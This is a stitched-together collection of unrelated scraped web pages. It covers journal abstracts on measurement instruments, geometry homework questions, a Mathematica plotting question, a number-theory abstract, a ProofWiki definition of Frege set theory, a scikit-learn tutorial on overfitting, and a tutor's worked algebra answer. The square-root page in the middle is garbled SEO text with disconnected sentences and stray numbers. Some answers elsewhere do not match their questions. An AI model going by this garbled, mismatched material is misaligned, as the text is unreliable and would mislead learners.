In this paper, we propose algorithms that are suitable for gamma-ray spectrometric systems with NaI(Tl) detectors that support pileup correction at extremely high count rates of 4 × 10⁶ pulses/s. The following two algorithms are presented: 1) an algorithm based on modified phase-only correlation (MPOC) for the detection of the beginning of pulses and maximum likelihood estimation (MLE)...

• ### Prestiction Friction Modeling and Position Control in an Actuated Rotary Arm
Publication Year: 2010, Page(s):131 - 139. Cited by: Papers (6)
In this paper, using experiment and theory, we study the dynamic characteristics of a rotary single-link arm in free motion when the effect of hub friction is significant. Our objective is to identify the important phenomena that affect the system using an adequate friction model. We introduce a friction regime, called "prestiction", and a friction model for capturing this regime. Comparisons ar...

• ### A New Method for Measuring the Level Dependence of AC Shunts
Publication Year: 2010, Page(s):140 - 144. Cited by: Papers (8)
We report on a new method for the measurement of the level dependence of the AC-DC difference of current shunts. The method is based on the use of a binary inductive current divider. A method to compare two AC shunts at common ground is described. Measurement results on two 1-A AC shunts, which consist of different numbers of resistors, indicate that the level dependence between 0.5 and 1 A is les...

• ### Calibrating an Arbitrary Test Fixture for a Symmetric Device by Three Measurements
Publication Year: 2010, Page(s):145 - 152. Cited by: Papers (5)
In this paper, a general solution of calibrating a microwave test fixture for a symmetric device is deduced from the cascading network relation, and it exposes the probability and condition of calibrating an arbitrary test fixture for a symmetric device by three measurements, which is less than the times of measurements in the thru-reflect-line (TRL) method. The scattering parameters of the test f...

• ### Monitoring Water Levels and Currents Using Reflected GPS Carrier Doppler Measurements and Coordinate Rotation Model
Publication Year: 2010, Page(s):153 - 163. Cited by: Papers (5)
This paper describes the development and application of a highly integrated Global Positioning System (GPS) receiver that employs reflected GPS signals to measure the floodwater levels, sea levels, and soil moisture of riverbeds. Both right- and left-hand circular polarization antennas are employed to simultaneously obtain direct and reflected signals. The objective of this paper is to use the car...

• ### Ultrasonic Measurement of Fine Head Movements in a Standard Ophthalmic Headrest
Publication Year: 2010, Page(s):164 - 170. Cited by: Papers (12)
We aimed to investigate the naturally occurring horizontal plane movements of a head stabilized in a standard ophthalmic headrest and to analyze their magnitude, velocity, spectral characteristics, and correlation to the cardio pulmonary system. Two custom-made air-coupled highly accurate (±2 µm) ultrasound transducers were used to measure the displacements of the head in different horizontal di...

• ### Reputation-Enabled Self-Modification for Target Sensing in Wireless Sensor Networks
Publication Year: 2010, Page(s):171 - 179. Cited by: Papers (19)
Wireless sensor networks provide new tools for sensing physical environments. However, the general existence of faulty sensor measurements in networks will cause degradation of the network service quality and huge burden of the precious energy. While cryptography-based approaches are helpless of information generation, reputation systems are demonstrated of positive results. In this paper, we inve...
View full abstract» • ### Harmonic Power Standard at NIM and Its Compensation Algorithm Publication Year: 2010, Page(s):180 - 187 Cited by:  Papers (16) | |PDF (261 KB) | HTML A new harmonic power standard has been developed at the National Institute of Metrology (NIM), Beijing, China, for the calibration of harmonic power analyzers under nonsinusoidal conditions at fundamental frequencies of 50 and 60 Hz. The standard is based on digital sampling techniques that do not require synchronization. A compensation algorithm is presented in this paper. A new definition of the... View full abstract» • ### A Very Low Offset Preamplifier for Voltage Measurements in the $muhbox{V}$ Range Publication Year: 2010, Page(s):188 - 194 Cited by:  Papers (2) | |PDF (247 KB) | HTML A new topology for the implementation of a very low offset voltage preamplifier is presented. The new topology employs a time-varying resistance as a probe for detecting the sign and magnitude of the equivalent input offset of an operational amplifier in a series-shunt feedback configuration and allows for continuously correcting the offset voltage by means of a proper control feedback. The most r... View full abstract» ## Aims & Scope Papers are sought that address innovative solutions to the development and use of electrical and electronic instruments and equipment to measure, monitor and/or record physical phenomena for the purpose of advancing measurement science, methods, functionality and applications. Full Aims & Scope Editor-in-Chief
https://www.jiskha.com/questions/971840/prove-the-statement-angle-abd-is-a-right-angle-and-angle-cbe-is-a-right-angle-and-prove
# Geometry

Prove the statement: angle ABD is a right angle and angle CBE is a right angle; prove that angle ABC is congruent to angle DBE.

1. Without a diagram, we have no idea what the letters mean.

2. Because it is given that q ∥ r and r ∥ s, then q ∥ s by the transitive property. Similarly, since we are given that a ∥ c and b ∥ c, then a ∥ b by the transitive property.

## Similar Questions

1. ### Geometry
Help! I'm so confused :( 1. Supply the missing reasons to complete the proof. Given: angle Q is congruent to angle T and line QR is congruent to line TR. Prove: line PR is congruent to line SR. Statement | Proof 1. angle Q is

2. ### Math
In trapezoid $ABCD$, $\overline{BC} \parallel \overline{AD}$, $\angle ABD = 105^\circ$, $\angle A = 43^\circ$, and $\angle C = 141^\circ$. Find $\angle CBD$, in degrees.

3. ### Geometry
Complete the two-column proof. Given: angle 2 and angle 5 are supplementary. Prove: l is parallel to m. Statements: 1. BLANK 2. angle 3 is congruent to angle 2 3. angle 3 and angle 5 are supplementary 4. BLANK Reasons: 1. ________

4. ### Math
Name a pair of complementary angles. (1 point) ∠1 and ∠4; ∠1 and ∠2; ∠3 and ∠4; ∠1 and ∠6

1. ### geometry
If segment BD bisects angle ABC, the measure of angle ABC = 7x, and the measure of angle ABD = 3x + 25, find the measure of angle DBC.

2. ### Geometry
Line BD bisects angle ABC. Find angle ABD, angle CBD, and angle ABC if angle ABD equals 3x + 6 and angle DBC equals 7x - 18. Please help, it would mean a lot.

3. ### Geometry
Ray BD bisects angle ABC. Find angle ABD if angle ABD = (6x + 4) degrees and angle DBC = (8x - 4) degrees.

4. ### geometry
Line BD bisects angle ABC. Solve for X and find the measures of angle ABC.
angle ABD = 5x, angle DBC = 3x + 10. I don't really understand this question, so can someone please help me solve it and explain how it is solved?

1. ### Geometric Proofs
Given: line AB is congruent to line AC; angle BAD is congruent to angle CAD. Prove: line AD bisects BC. Picture: an upside-down triangle divided in half to form two triangles, angle BAD and angle CAD, which share the common side AD.

2. ### math
In triangle ABC, angle B = 90° and BD is perpendicular to AC. Prove that angle ABD = angle ACB.

3. ### Geometry
Write a two-column proof. Given: angle STV is congruent to angle TVU; angle STU is congruent to angle UVS. Prove: angle SVT is congruent to angle UTV.

4. ### Maths
Two chords AB and CD of a circle intersect at right angles at a point inside the circle. If m(∠BAC) = 35°, find m(∠ABD).
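For the bisector question above (angle ABD = 5x and angle DBC = 3x + 10): since BD bisects angle ABC, the two halves must be equal, so 5x = 3x + 10. A quick Python sketch of that arithmetic (not part of the original thread):

```python
# BD bisects angle ABC, so angle ABD = angle DBC:
#   5x = 3x + 10  ->  2x = 10  ->  x = 5
x = 10 / 2
angle_ABD = 5 * x
angle_DBC = 3 * x + 10
angle_ABC = angle_ABD + angle_DBC  # the whole angle is the two equal halves
print(x, angle_ABD, angle_ABC)  # 5.0 25.0 50.0
```

So x = 5, each half measures 25 degrees, and angle ABC measures 50 degrees.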
https://www.snapxam.com/calculators/equations-with-cubic-roots-calculator
# Equations with cubic roots Calculator

## Get detailed solutions to your math problems with our Equations with cubic roots step-by-step calculator. Practice your math skills and learn step by step with our math solver. Check out all of our online calculators here!

### Difficult Problems

Solved example of equations with cubic roots:

1. $y=\left(2^{\frac{1}{3}}\right)^2$
2. Divide $1$ by $3$: $y=\left(\sqrt[3]{2}\right)^2$
3. Calculate the power $1.2599^2$: $y=1.5874$

### Struggling with math?

Access detailed step by step solutions to millions of problems, growing every day!
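As a sanity check on the worked example (not part of the calculator itself): by the power rule, $(2^{1/3})^2 = 2^{2/3}$, and evaluating that directly reproduces the rounded result $1.5874$. A small Python sketch:

```python
# (cube root of 2), squared
y = (2 ** (1 / 3)) ** 2

# Exponent rule: (2^(1/3))^2 = 2^(2/3); both evaluations agree numerically
assert abs(y - 2 ** (2 / 3)) < 1e-12

print(round(y, 4))  # 1.5874
```

Evaluating the exact expression $2^{2/3}$ directly avoids the small rounding drift you get from squaring an already-rounded cube root like 1.2599.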
http://openstudy.com/updates/510490eee4b0ad57a5632de5
## kris2685: translate to an algebraic expression: the sum of D and F

1. UnkleRhaukus: D+F
2. moser90: F + D. I think we need more info to help.
3. moser90: So then it would be D+F.
4. TeemoTheTerific: d+f
5. UnkleRhaukus: $\sum\times D\land F$
6. lake33: The question was "what is the sum of d and f"; that was all.
https://mylifecoach.uk/496ga7a/157367-is-the-square-root-of-50-a-whole-number
# is the square root of 50 a whole number The perfect squares are the squares of the whole numbers: 1, 4, 9, 16, 25, 36, 49, 64, 81, 100 … The square root of a number, n, written . What would happen if $\sqrt{}$ instead meant the negative square root? How to find the square root of a number. STEP 6: Subtract Again. The square root of 49 is 7 and the square room of 64 is 8, so all of the number between 49 and 64 have a square root that is a decimal between 7 and 8. Is it wrong to say that $100$ is solution of $\sqrt x+10=0$? At first glance, this would appear to be so, because the poster's example finds the square root of the two digit whole number 20 instead of the article's example of 645. For example, 4 has two square roots: 2 and -2. 5.858585858 63.4 square root 21 square root 36 2. However, I actually worked out the article's example (square root of 645) using both methods and found that the Babylonian Method required 9 "cycles of divide and average" to arrive at the answer. Natural (Counting) Numbers: Whole Numbers: Natural Numbers and . It is the second digit in the root. Which is equal to the square root of 1 over the square root of 100, which is equal to 1/10, or 0.1. Go here for the next problem on our list. 1. (a) Does the square root of the number 40 lie between the 6 and 7? Many square roots of numbers turn out to be irrational roots, that is irrational numbers. We have the square root of 0.01. Let's do J. 23 1 over 4 square root 27 3.402538 3. For example: 16 divided by 4 is 4. Prime Factors can help determine if a number will have a square root that is rational or irrational. And they are all whole numbers. Thus, a = 8 and b = 9. It is an irrational number, but you can simplify it or find rational approximations for it.. 
First note that $50 = 2 \times 5 \times 5$ contains a square factor $5^2$. We can use this to simplify the square root: $\sqrt{50} = \sqrt{5^2 \cdot 2} = \sqrt{5^2}\cdot\sqrt{2} = 5\sqrt{2}$. Here are the square roots of all the perfect squares from 1 to 100. Examples. For the numbers above, the square root was equal to an integer. Can the square root of a real number be negative? A number is a perfect square when you can directly extract its square root in whole numbers and without approximation. The reason the square root of 0.2003 is greater than 0.2003 is that when you take the square root of the dividend (√2003), the decrease of the dividend is smaller than the decrease of the divisor when you take the square root of the divisor (√10000). Square Root Table: In mathematics, the square of a number refers to the value we get after multiplying the same number by itself (Y × Y = X). If the square root of an integer is another integer, then the square is called a perfect square. The good news is that the square root of a whole number is rational precisely when it is an integer. It is not always possible to get the square root as an integer. Determine the type of number: square root of 49. Simplifying the square root of a whole number. Square root of a whole number: number of solutions. However, for numbers that aren't perfect squares, you'll have to use a method that involves estimation (or you can use a table of squares and square roots). Calculating square roots and nth roots is fairly intensive. All whole numbers lie to the right of the zero on the number line. We will find a whole number bigger than the square root of 102 and a whole number smaller than the square root of 102.
To take the square root of a number, press [2ND] (the secondary function key) and then [√ ] (the radical symbol key which is used to take the square root of a number) and then the number that you want to find the square root of and then the [ENTER] key.Example: To find the square root of 2, push: [2ND] [√ ] 2 [ENTER] This will give you the answer of: 1.414213562 if done correctly. A perfect square root is where the square root of a number equals another whole number. Subtract the product we calculated (which is 425) from the current number on the left (also 425). i.e., the square root of 4 is √4=2 which when multiplied by itself gives the original definite number 4. The square root of 17 is between 4 and 5. Example: 1 - 1 4 - 2 9 - 3 16 - 4... up to 961 - 31...Which is the last square root before 1000. They are all integers, which means they do not have decimal points or fractions. This is an online chart which consists of a list of square root values for numbers 1 to 100. The square root of #50# is not a whole number, or even a rational number. But I’ll bite. Here, the square root of X (√X) refers to Y.Every non-negative number such as 1,2,3,4,5,…, etc., can have a non-negative square root such as √4=2,√9=3,√16=4, etc.The square root lists can be written in a table. Suppose, x is the square root of y, then it is represented as x=√y or we can express the same equation as x 2 = y. Here,’√’is the radical symbol used to represent the root of numbers. Integers: Rational Numbers: Integers, Fractions, and Terminating or Repeating Decimals. Find the square root of 56.25, without using long division method? Note that the term "radicand" refers to the number for which the root is to be determined. For example 25 is a perfect square since $$\pm \sqrt{25}= \pm 5$$ If the radicand is not a perfect square i.e. This would not be the case if the whole number in front of the decimal point wasn't 0. These are equivalent statements, but both of them are irrational. 
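The perfect-square list sketched above (1 → 1, 2 → 4, …, up to 961 → 31, the last square before 1000) can be generated directly; a minimal Python sketch:

```python
# Map each whole number 1..31 to its perfect square; 31^2 = 961 is the
# last perfect square below 1000, since 32^2 = 1024 already exceeds it.
squares = {k: k * k for k in range(1, 32)}

print(list(squares.items())[:4])  # [(1, 1), (2, 4), (3, 9), (4, 16)]
print(squares[31], 32 * 32)       # 961 1024
```

A number has a whole-number square root exactly when it appears among the values of this table.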
The square root of a number $n$ is the number that gives $n$ when multiplied by itself; in equation format, $\sqrt[n]{a} = b$ means that $b^n = a$. A perfect square root is one where the square root of a number equals another whole number: for example, the square root of 144 is 12, and the square root of 25 is 5, since $5 \times 5 = 25$. When you subject a number to a radical sign you may get a real number that is not whole; it is not always possible to get the square root as an integer, and the square root of 50 is not a whole number, or even a rational number.

To estimate a square root, make a reasonable guess (an approximate root). You could also use a calculator: hit the square root key, type 51, and see what decimal you get, about 7.1, which is between 7 and 8. Similarly, you can estimate the square root of 17 to be about 4.1, since 17 lies between $4^2 = 16$ and $5^2 = 25$. In general, to trap a root such as $\sqrt{78}$ between whole numbers, find $a$ and $b$ with $a^2 < 78 < b^2$, so that $a < \sqrt{78} < b$; since $8^2 = 64$ and $9^2 = 81$, we get $8 < \sqrt{78} < 9$.
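The main points of the article can be checked in a few lines of Python; this is an illustrative sketch (not part of the original article) using the standard library's `math.isqrt`, the integer square root:

```python
import math

n = 50
r = math.isqrt(n)          # largest whole number whose square is <= 50
is_perfect = (r * r == n)  # perfect square <=> the integer root is exact
print(r, is_perfect)       # 7 False -> sqrt(50) is not a whole number

# 50 = 25 * 2 contains the square factor 25, so sqrt(50) = 5*sqrt(2)
assert abs(math.sqrt(50) - 5 * math.sqrt(2)) < 1e-12

# sqrt(50) lies strictly between the consecutive whole numbers 7 and 8
assert r < math.sqrt(50) < r + 1
```

The same `isqrt` trick gives the "trap between consecutive squares" estimate for any non-square, e.g. `math.isqrt(78)` returns 8, so √78 lies between 8 and 9.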
https://mathematica.stackexchange.com/questions/149596/problems-evaluating-a-simple-vectorial-field-with-vectorplot
# Problems evaluating a simple vectorial field with VectorPlot [duplicate]

I'm trying to plot the electrostatic field generated from a single charge on a plane. Without the $\frac{1}{4\pi\varepsilon_0}$ factor and the value of the charge $q$, as a function of $x, y$ the electric field is $$\vec{E}(\vec{r})\equiv\vec{E}(x,y) = \frac{\vec{r}}{|\vec{r}|^3}\equiv\begin{cases}\frac{x}{(x^2+y^2)^{\frac{3}{2}}}\\ \frac{y}{(x^2+y^2)^{\frac{3}{2}}}\end{cases}$$ I thought the best way to plot this plane field was the function VectorPlot. Here is the code I entered and the output result VectorPlot[{x/((x^2 + y^2)^(3/2)), y/((x^2 + y^2)^(3/2))}, {x, -1, 1}, {y, -1, 1}] I tried to change x_min/x_max and y_min/y_max but I got the same outcome. Why is it plotting only one vector? What am I missing? I then decided to look at StreamDensityPlot: StreamDensityPlot[{x/((x^2 + y^2)^(3/2)), y/((x^2 + y^2)^(3/2))}, {x, -1, 1}, {y, -1, 1}, ColorFunction -> "Rainbow"] Now I'm a little bit confused about the use of these two plotting functions, as the Mathematica documentation online uses only simple vector fields such as $f(x,y) = (x,y)$ and everything looks so cool, but when I approach this basic vector field of physics I get only terrible results. Any ideas? • Another possibility is StreamPlot, which is meant to show the direction of the field at each point, regardless of its intensity – glS Jul 3, 2017 at 14:27 VectorScale can be used to take control of the amplitude. f[x_, y_] := {x/(x^2 + y^2)^(3/2), y/(x^2 + y^2)^(3/2)} When close to the origin, set the Norm of the vector (argument #5) to None. You may want to tweak the value; I used the radius of 0.2, corresponding to Norm[f[0.2, 0.2]] = 12.5. Implementing this in VectorPlot: VectorPlot[f[x, y], {x, -1, 1}, {y, -1, 1}, VectorScale -> {Automatic, Automatic, Function[If[#5 > 12.5, None, #5]] }]
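The cutoff 12.5 used in the answer can be verified outside Mathematica: since $\vec E = \vec r/|\vec r|^3$, its norm is $1/|\vec r|^2$, which at $(0.2, 0.2)$ gives $1/0.08 = 12.5$. A small numpy sketch (the name `field` is just an illustrative stand-in for the Mathematica `f`):

```python
import numpy as np

def field(x, y):
    """E = r / |r|^3 for a point charge at the origin (prefactors dropped)."""
    r2 = x ** 2 + y ** 2
    return np.array([x, y]) / r2 ** 1.5

norm_at_probe = np.linalg.norm(field(0.2, 0.2))
print(round(norm_at_probe, 6))  # 12.5, the VectorScale cutoff in the answer
```

This is why the unscaled plot looks degenerate: the field magnitude blows up like $1/|\vec r|^2$ near the charge, so one huge arrow near the origin dominates the automatic scaling.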
https://www.impan.pl/pl/wydawnictwa/czasopisma-i-serie-wydawnicze/colloquium-mathematicum/online/114226/explicit-averages-of-square-free-supported-functions-to-the-edge-of-the-convolution-method
## Explicit averages of square-free supported functions: to the edge of the convolution method

Colloquium Mathematicum

MSC: Primary 11N37; Secondary 11A25, 11A41.

DOI: 10.4064/cm8337-11-2020

Published online: 14 June 2021

#### Abstract

We give a general statement of the convolution method so that one can provide explicit asymptotic estimations for all averages of square-free supported arithmetic functions that have a sufficiently regular behavior on the prime numbers and observe how the nature of this method gives error estimations of order $X^{-\delta }$, where $\delta$ belongs to an open set $I$ of positive reals. In order to have a better error estimation, a natural question is whether or not we can achieve an error term of critical order $X^{-\delta _0}$, where $\delta _0$, the critical exponent, is the right endpoint of $I$. We answer this in the affirmative by presenting a new method that improves qualitatively almost all instances of the convolution method under some regularity conditions; now, the asymptotic estimation of averages of well-behaved square-free supported arithmetic functions can be given with its critical exponent and a reasonable explicit error constant. We illustrate this new method by analyzing a particular average related to the work of Ramaré–Akhilesh (2017), which leads to notable improvements when imposing non-trivial coprimality conditions.

#### Authors

• Sebastian Zuniga Alterman, Institut de Mathématiques de Jussieu, Université Paris Diderot P7, Bâtiment Sophie Germain, 8 Place Aurélie Nemours, 75013 Paris, France
https://www.proofwiki.org/wiki/Definition:Frege_Set_Theory
# Definition:Frege Set Theory ## Definition The Frege system of set theory is a system of axiomatic set theory which has as its sole axiom the comprehension principle: Given any property $P$, there exists a unique set which consists of all and only those objects which have property $P$: $\set {x: \map P x}$ In support of this, the various logical axioms supporting predicate logic also hold. It is accepted that the above statement lacks clarity, but the field of symbolic logic was less well understood when this system was first defined. ## Also see • Results about Frege set theory can be found here. ## Source of Name This entry was named for Gottlob Frege.
https://chunml.github.io/ChunML.github.io/tutorial/Underfit-Overfit/
# Machine Learning Part 5: Underfitting and Overfitting Problems Here we are again, in the fifth post of Machine Learning tutorial series. Today I will talk about two common problems you may face in Machine Learning: Underfitting and Overfitting. Wait! There is something wrong, isn’t it? - You may wonder… Of course I remember promising you in the previous post, that today I will dig deeper into Linear Regression, and together we will do some coding. Actually, I intended to name today’s post “Implementing Linear Regression” or something, but I soon realized that it would be inappropriate. Good news is today’s post will mainly focus on implementation of Linear Regression, and what we can do to improve the quality of the Model. By doing that, I am actually leading you to go into some concept which is more general, and can be applied not only in Linear Regression, but every spot which Machine Learning takes place. That is enough of talking. First, let’s get our hands dirty. If you went through my previous post, you would now have everything set up. But if you didn’t, you might want to take a look at it here: Setting Up Python Environment. ### Implementing Linear Regression Open Terminal and go into Python console mode: Now let’s import sklearn module for Linear Regression. sklearn is a shortname of scikit-learn, a great Python library for Machine Learning. We are not using only LinearRegression. We will work with arrays, so here I also imported numpy for dealing with arrays. We will also draw some graphs to visualize the data, so that’s why I imported pyplot, a great module for graph drawing. Remember the data I used in the previous post on Linear Regression? 
I will show it right below for you:

| X | y |
|---|---|
| 1 | 7 |
| 2 | 8 |
| 3 | 7 |
| 4 | 13 |
| 5 | 16 |
| 6 | 15 |
| 7 | 19 |
| 8 | 23 |
| 9 | 18 |
| 10 | 21 |

Now let's use that to prepare our training data. Nearly every Machine Learning library requires data to be formatted in such a way that each row is one training example (or testing example), and each column represents one feature's data. So we have to reshape our data accordingly.

Now let's plot our training data. You will get the same figure as the one in the previous post. Next, let's initialize the Linear Regression model. Then we will train our Model using the training data above. You can do that by simply calling the fit function, which takes the feature matrix $$X$$ and the label vector $$y$$ as parameters.

Our training data is quite simple, so the learning process finished so fast it was as if it had never happened. All the changes made during training (the weights and bias) were stored in the model object. Let's see what we got. Obviously, you can get more information through other attributes of the model object, but for now we will only focus on coef_, which stores the weight parameter, and intercept_, which stores the bias parameter.

Next, let's compute the prediction vector $$a$$, using the obtained weight and bias. Now let's draw $$X$$, $$y$$ and $$a$$ on the same plot. Here we get a straight line, which fits the data better than what we did before (which is easy to understand, since back then we only went through 4 iterations).

So simple, right? With just a few lines of code, we have prepared our training data, trained our Model, and visualized the result! Yeah, scikit-learn helps us do all the heavy lifting. In later posts, you will see that it can even handle more complicated jobs.

### Improving the performance of Linear Regression

Obviously, we can see that the straight line above fits pretty well, but not well enough. We need a more suitable approach.
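The data preparation and training steps walked through above can be sketched like this (variable names are assumptions; the data values come from the table):

```python
import numpy as np
from sklearn.linear_model import LinearRegression

# One row per training example, one column per feature:
# reshape the ten x values into a 10x1 feature matrix.
X = np.arange(1, 11).reshape(-1, 1)
y = np.array([7, 8, 7, 13, 16, 15, 19, 23, 18, 21])

model = LinearRegression()
model.fit(X, y)  # train on feature matrix X and label vector y

print(model.coef_)       # the weight parameter, roughly [1.776]
print(model.intercept_)  # the bias parameter, roughly 4.933

# The prediction vector a, computed from the obtained weight and bias;
# plotting X, y and a together reproduces the straight-line figure:
# plt.scatter(X, y); plt.plot(X, a)
a = model.coef_[0] * X + model.intercept_
```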
But first, let's evaluate how well the Model performs numerically, by computing the accuracy over the training data. We cannot always evaluate something just by looking at it, right? We need something more concrete: a number. By looking at numbers, we get a better view, and can easily compare different things. scikit-learn provides us with the score function, whose parameters are similar to those of the fit function. And you can see that our Model now has an accuracy of 85% over the training data. Commonly, we demand a higher accuracy, say 90% or 95%. So by looking at the current accuracy, we can tell that our Model is not performing as we expected. So let's think about an improvement. But how can we do that?

Remember I told you about Features in the first post? Features are something we use to distinguish one object from others. So obviously, if we have more Features, then we will likely have a better-fitting model, since it receives more of the information needed for training. But how can we acquire more Features?

#### Polynomial Features

The easiest way to add more Features is to compute polynomial features from the provided ones. It means that if we have $$X$$, then we can use $$X^2$$, $$X^3$$, etc. as additional features. So let's use this approach and see if we can improve the current Model. First, we have to modify our $$X$$ matrix by adding $$X^2$$. Similar to the previous step, let's train our new Model, then compute the prediction vector $$a$$. Mathematically, we now have $$a=\theta_0 + \theta_1X + \theta_2X^2$$. Note that we now have a more complicated matrix $$X$$, so we will have to use the dot function; an error will occur if we just use the multiply operator like above. I also created a new $$x$$ variable, which ranges from 1 to 10, but with a 0.1 step. Using the new $$x$$ to compute $$a$$ results in a smoother graph of $$a$$, since $$a$$ is no longer a straight line.
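The evaluation and the degree-2 polynomial features can be sketched as follows (note that score() actually returns the R² coefficient of determination, which the post loosely calls accuracy):

```python
import numpy as np
from sklearn.linear_model import LinearRegression

X = np.arange(1, 11).reshape(-1, 1)
y = np.array([7, 8, 7, 13, 16, 15, 19, 23, 18, 21])

model = LinearRegression().fit(X, y)
print(model.score(X, y))  # roughly 0.85, the 85% figure quoted above

# Add X^2 as a second polynomial feature and retrain:
X2 = np.hstack([X, X ** 2])
model2 = LinearRegression().fit(X2, y)

# a = theta_0 + theta_1*x + theta_2*x^2. Because the feature matrix now
# has two columns, we use np.dot; a plain elementwise multiply would not
# combine the two coefficients. A finer x grid (step 0.1) makes the
# curve look smooth, since a is no longer a straight line.
x = np.arange(1, 10.1, 0.1).reshape(-1, 1)
a = np.dot(np.hstack([x, x ** 2]), model2.coef_) + model2.intercept_
```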
Now let's plot things out and see what we get with the new feature matrix. As you can see, we now obtain a curved line, which seems to fit our training data much better. To be more concrete, let's use the score function. You see that? We now get a new accuracy of 87%, a nice improvement, right? At this point, you may think that we can improve it a lot more by continuing to add more polynomial features. Well, don't guess. Let's just do it. This time we will add features up to degree 9.

We now obtain a new curve which fits our training data perfectly. Let's use the score function again to get an exact number. Wow, look at what we have here: an accuracy of 100%. This is real magic, you may think. But that is just where the tragedy begins…

### OVERFITTING & UNDERFITTING

Now let's imagine our data has 15 examples in total, and I only showed you the first 10. I will reveal the last 5 examples below:

| X | y |
|---|---|
| 11 | 24 |
| 12 | 23 |
| 13 | 22 |
| 14 | 26 |
| 15 | 22 |

So actually our data looks like this. Let's see what happens if we use the Model obtained from the degree 9 polynomial features. Do you see what I am seeing? What a tragedy! It doesn't seem to fit the new data at all! We don't even feel the need to compute the accuracy on the new data! So what the hell is this all about?

As I told you before, in the first post, we only provided a fixed set of training data, and the Model has to deal with new data which it has never seen before. New data, which may vary in unpredictable ways in real life, penalized our trained Model this time! In Machine Learning terms, we call this the OVERFITTING problem (or High Variance). Overfitting, as the name explains itself, means that the Model fits the data very well when we provide a set of data containing a lot of features. We can see that the Model tends to memorize the data rather than learn from it, which makes it unable to predict new data.
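The degree-9 experiment and the reveal of the last five examples can be sketched the same way (data values come from the two tables; the rest is an assumption about the original code):

```python
import numpy as np
from sklearn.linear_model import LinearRegression

X = np.arange(1, 11).reshape(-1, 1)
y = np.array([7, 8, 7, 13, 16, 15, 19, 23, 18, 21])

def poly(X, degree):
    """Expand a column of x values into [x, x^2, ..., x^degree]."""
    return np.hstack([X ** d for d in range(1, degree + 1)])

# Ten coefficients (degree 9 plus an intercept) against ten points:
# the model can interpolate the training data essentially exactly.
model9 = LinearRegression().fit(poly(X, 9), y)
print(model9.score(poly(X, 9), y))  # essentially 1.0, the "100% accuracy"

# The last five examples, revealed above:
X_new = np.arange(11, 16).reshape(-1, 1)
y_new = np.array([24, 23, 22, 26, 22])

# On data it has never seen, the interpolating polynomial explodes,
# so the R^2 score is hugely negative:
print(model9.score(poly(X_new, 9), y_new))
```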
In contrast, what happens if we use just one feature, like we did in the beginning (or, put differently, if we provide a set of data which is poorly informative)? You have already seen that it results in a very low accuracy, which is not what we expected either. We call this problem UNDERFITTING (or High Bias). Overfitting and Underfitting are both things we try to avoid, and you will face these problems all the time when you work with Machine Learning. Of course, there are many ways to deal with them, but I will leave the details for a future post. This time I will tell you the simplest one, which can be seen as a "must-do" first step in any Machine Learning problem.

### Splitting the dataset for training and testing

The first thing to do to prevent the problems above is to always split the dataset into training data and testing data. Never just count on the accuracy over the training data! Why? Because even though we obtained a high accuracy, it does not mean that our Model is doing a good job; on the contrary, we need to watch out for the Overfitting problem. By splitting our dataset into two separate parts, we use one part for training, and the other for evaluating the trained Model. Because we evaluate the performance on separate data, we can tell whether our Model works well with new data that it has never seen, and so we can tell whether our Model has an Overfitting problem. Underfitting, on the other hand, can easily be discovered just by looking at the accuracy over the training data, because a Model with an Underfitting problem performs poorly on both datasets. Finally, we pick the Model which has the highest accuracy on the testing data.

With the approach I have shown you, let's decide which Model to choose among the three models above. We will use the first ten examples as training data, and the last five examples for testing. As you can see, both by visualizing the fits and by looking at the accuracies:
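The train/test comparison of the three models can be sketched as follows (again, variable names are assumptions; score() is R², the post's "accuracy"):

```python
import numpy as np
from sklearn.linear_model import LinearRegression

# First ten examples for training, last five for testing.
X_train = np.arange(1, 11).reshape(-1, 1)
y_train = np.array([7, 8, 7, 13, 16, 15, 19, 23, 18, 21])
X_test = np.arange(11, 16).reshape(-1, 1)
y_test = np.array([24, 23, 22, 26, 22])

def poly(X, degree):
    """Expand a column of x values into [x, x^2, ..., x^degree]."""
    return np.hstack([X ** d for d in range(1, degree + 1)])

results = {}
for degree in (1, 2, 9):
    m = LinearRegression().fit(poly(X_train, degree), y_train)
    results[degree] = (m.score(poly(X_train, degree), y_train),  # training score
                      m.score(poly(X_test, degree), y_test))     # testing score
    print(degree, results[degree])

# Degree 9 wins on the training data but collapses on the test data;
# the final choice goes to the model with the best testing score.
```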
Our first model is too simple and didn't fit our data well. This is an example of the Underfitting problem. In contrast, our third model is way too complicated: it performed very well on the training data, but failed to fit the testing data. This is what we call the Overfitting problem. The second model may not fit the training data as well as the third model, but it is the one that actually learned, which results in good performance on the testing data. And we can reasonably say that it will also predict well on other data which it has never seen during training.

### Conclusion

So today, through implementing Linear Regression, I led you through the most common problems you may face when working with Machine Learning: Underfitting and Overfitting. I also showed you the easiest way to avoid those problems, which is to always split the dataset into two parts: one for training, and one for testing. I hope you find today's post helpful and that you have now taken a further step into the Machine Learning world. There is no stopping now that you have gone this far. In the next post, I will continue with Logistic Regression, an extremely important algorithm that you must understand, because it is the key which leads you to the most powerful learning technique of today: Neural Networks. So stay tuned, and I will be with you soon. See you!
https://tutorme.com/tutors/204609/interview/
# Tutor profile: Joseph B.

Math and Science tutor for 2 years

## Questions

### Subject: Linear Algebra

Question: Find the solutions of the given system: $$x+2y=1$$ $$3x+2y+4z=7$$ $$-2x+y-2z = -1$$

Joseph B.: We can solve this using a mixture of Gaussian elimination and substitution. First we multiply row 1 by -3 and add it to row 2: $$-3[x+2y] +[3x +2y+4z] = -3(1) + 7$$ Then we multiply row 1 by 2 and add it to row 3: $$2[x+2y] + [-2x +y - 2z] = 2(1) + (-1)$$ This gives us a new system: $$x+2y = 1$$ $$-4y +4z =4$$ $$5y -2z = 1$$ We can divide row 2 by 4: $$x+2y = 1$$ $$-y +z =1$$ $$5y -2z = 1$$ We repeat the above process using row 2, multiplying it by 2 and 5 and then adding it to row 1 and row 3 respectively. After doing so, our new system looks like this: $$x +2z = 3$$ $$-y +z =1$$ $$3z = 6$$ Solving row 3 gives us $$z = 2$$; substituting $$z=2$$ into row 1 gives $$x = 3 - 2(2) = -1$$, and substituting $$z=2$$ into row 2 and solving tells us that $$y=1$$.

### Subject: Trigonometry

Question: Using double angle identities, prove that $$1-\sin^{2}{x} = \cos^{2}{x}$$

